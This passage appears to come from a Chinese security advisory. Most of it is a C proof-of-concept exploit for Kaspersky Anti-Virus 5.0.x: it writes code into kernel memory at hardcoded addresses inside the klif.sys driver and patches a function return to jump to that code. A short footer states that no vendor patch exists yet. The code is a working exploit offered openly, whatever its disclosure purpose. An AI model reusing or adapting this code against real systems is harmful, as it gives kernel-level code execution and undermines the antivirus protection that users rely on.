//Prepare our data into ring0-zone.
PCHAR pNotepadName=(PCHAR)0xBE938200;
char temp_buffer[MAX_PATH];
char *s;
SearchPath(NULL,"NOTEPAD",".EXE",sizeof(temp_buffer),temp_buffer,&s);
lstrcpy(pNotepadName,temp_buffer);
PCHAR pMessage=(PCHAR)0xBE938400;
lstrcpy(pMessage,"Notepad is running!!! KAV is vulnerable!!!");
memmove(pCodeBase,code,sizeof(code));
*pJmpAddress=(DWORD)pCodeBase;
memmove(pKAVRet,jmp_code,sizeof(jmp_code));
return TRUE;
}
///////////////////////////////////////////////////////////////
void UnloadExploitFromKernelMemory(){
UCHAR retn_4[]={0xC2,0x04,0x00};
memmove(pKAVRet,retn_4,sizeof(retn_4));
}
/////////////////////////////////////////////////////////////////
PUCHAR GetKAVRetAddress(void){
//Check the retn 4 in the KAV 0xBE9334E1 function end
//Also, we check the KAV klif.sys existance.
UCHAR retn_4[]={0xC2,0x04,0x00};
__try{
for(DWORD i=0;i<sizeof(pKAVRets)/sizeof(pKAVRets[0]);i++){
if(memcmp(pKAVRets[i],retn_4,sizeof(retn_4))==0)
return pKAVRets[i];
}
}__except(EXCEPTION_EXECUTE_HANDLER){MessageBox(NULL,"KAV is not \
installed",NULL,0);return NULL;}
MessageBox(NULL,"Wrong KAV version. You need 5.0.227, 5.0.228 or 5.0.335 versions of \
KAV",NULL,0); return NULL;
}
/////////////////////////////////////////////////////////////////
void main(void){
pKAVRet=GetKAVRetAddress();
if(NULL==pKAVRet)
return;
if(!LoadExploitIntoKernelMemory())
return;
char temp_buffer[MAX_PATH];
char *s;
SearchPath(NULL,"NOTEPAD",".EXE",sizeof(temp_buffer),temp_buffer,&s);
PROCESS_INFORMATION pi;
STARTUPINFO si={0};
si.cb=sizeof(si);
CreateProcess(NULL,temp_buffer,NULL,NULL,FALSE,
0,NULL,NULL,&si,&pi);
WaitForSingleObject(pi.hProcess,INFINITE);
MessageBox(NULL,"Now you may start your own Notepad instance to check this \
exploit!","KAV_EXPLOITER",0);
MessageBox(NULL,"Close this window to stop exploitation","KAV_EXPLOITER",0);
UnloadExploitFromKernelMemory();
}
建议:
-------------------------------------------
厂商补丁:
Kaspersky Labs
--------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
_blank>http://www.kaspersky.com/